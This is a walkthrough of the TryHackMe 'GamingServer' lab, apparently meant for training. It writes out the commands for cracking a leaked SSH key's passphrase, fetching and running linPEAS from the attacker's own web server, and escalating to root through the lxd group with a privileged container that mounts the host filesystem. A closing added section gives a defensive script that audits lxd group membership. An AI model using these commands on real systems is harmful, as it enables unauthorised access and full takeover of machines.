TryHackMe GamingServer Writeup
This is a writeup for the TryHackMe room GamingServer.
NMAP
10.10.133.120 is the IP address of our target.
nmap 10.10.133.120
Gobuster
gobuster dir -u 10.10.133.120 -w ./gobusterDir.txt
Webpage Inspection
While looking for clues on the webpage, I found that someone had left a comment that mentions john. He might be a user we can try over SSH.
As gobuster shows, there is a secret page, and on it I found an RSA key named secretKey.
SSH
Now we can crack the RSA key we found earlier. I will create a new file, name it rsaid and paste the key into it. Let's open JTR and convert the key to a txt file so that John can crack it.
/usr/share/john/ssh2john.py rsaid > rsaid.txt
john rsaid.txt --wordlist=rockyou.txt
We can connect using SSH now, but first I will set 600 permissions on our rsaid file.
Let's connect with our RSA key and the password that we found.
ssh -i 'rsaid' john@10.10.133.120
User Flag
We logged in successfully. Now let's search for the user flag. It is probably named user.txt, so I will search for it directly.
Well, the flag was in our directory. I opened it and obtained the flag.
Privilege Escalation and Root Flag
Now we need a way to gain root access. We can use linPEAS for this.
PEASS-ng/linPEAS at master · peass-ng/PEASS-ng (github.com)
First, let's host a Python web server on our machine in the folder where the linpeas.sh file is located.
sudo python3 -m http.server 80
We can use wget on the target machine to retrieve the linpeas.sh file.
wget yourip:port/linpeas.sh
Let's make the file executable with chmod +x and run it.
It seems we are in the lxd group, so we can use this to gain root access. We start by downloading the LXD Alpine builder to our local machine.
saghul/lxd-alpine-builder: Build Alpine Linux images for LXD (github.com)
Let's download the build-alpine file and execute it. This should create a compressed file.
We can host a server the same way we did before.
python -m http.server
Let's continue on our target host. Download the file from our server with wget.
wget yourip:yourport/alpine-v3.20-x86_64-20240710_1606.tar.gz
Now we can run the following commands to get root access.
lxc image import ./alpine-v3.20-x86_64-20240710_1606.tar.gz
lxc image list
lxc init 11e9cf25a267 ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Now we can cd to /mnt/root/root/ and obtain the flag.
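The escalation above works because john is a member of the lxd group, which lets him start a privileged container with the host's / mounted inside it. As an added example (not part of the original writeup), this shell function audits which accounts hold that membership, including through a primary GID that /etc/group does not list. The function names and the sample group and passwd entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: list accounts that belong to a root-equivalent group
# (here lxd), via /etc/group or via a primary GID in /etc/passwd.

# audit_group_members GROUP [GROUP_FILE] [PASSWD_FILE]
# Prints one "user<TAB>via" line per member, sorted. "via" is
# "supplementary" (listed in the group file) or "primary" (passwd GID).
audit_group_members() {
    grp=$1
    group_file=${2:-/etc/group}
    passwd_file=${3:-/etc/passwd}
    awk -F: -v grp="$grp" '
        # Group database: remember the GID and print the listed members.
        FILENAME == ARGV[1] {
            if ($1 == grp) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++)
                    if (m[i] != "") print m[i] "\tsupplementary"
            }
            next
        }
        # passwd database: users whose primary GID is the audited group
        # do not appear in the member list, so check them separately.
        gid != "" && $4 == gid { print $1 "\tprimary" }
    ' "$group_file" "$passwd_file" | sort -u
}

# Constructed sample databases (not copied from the target machine).
write_sample_files() {
    printf '%s\n' 'root:x:0:' 'sudo:x:27:john' \
        'lxd:x:108:john,deploy' > "$1/group"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'john:x:1000:1000::/home/john:/bin/bash' \
        'deploy:x:1001:1001::/home/deploy:/bin/sh' \
        'buildbot:x:1002:108::/home/buildbot:/bin/sh' > "$1/passwd"
}

# Demo run on the constructed data.
demo_dir=$(mktemp -d)
write_sample_files "$demo_dir"
audit_group_members lxd "$demo_dir/group" "$demo_dir/passwd"
rm -rf "$demo_dir"
```

Called with only the group name, the function reads the live /etc/group and /etc/passwd; any account it prints that does not need to manage containers should be removed from the group.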